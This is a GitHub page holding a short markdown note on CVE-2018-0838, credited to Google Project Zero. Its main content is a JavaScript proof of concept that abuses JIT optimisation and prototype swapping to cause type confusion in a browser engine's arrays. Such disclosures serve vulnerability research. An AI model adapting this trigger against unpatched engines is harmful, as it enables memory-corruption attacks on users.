Skip to content

Latest commit

 

History

History
37 lines (27 loc) · 705 Bytes

CVE-2018-0838.md

File metadata and controls

37 lines (27 loc) · 705 Bytes
Raw

CVE-2018-0838

  • Fix: Feb 2018
  • Credit: lokihardt of Google Project Zero

PoC

function inlinee() {

}

function opt(arr) {
    arr[0] = 1.1;
    new inlinee();
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }

    inlinee.prototype = arr;
    opt(arr);

    print(arr);
}

Reference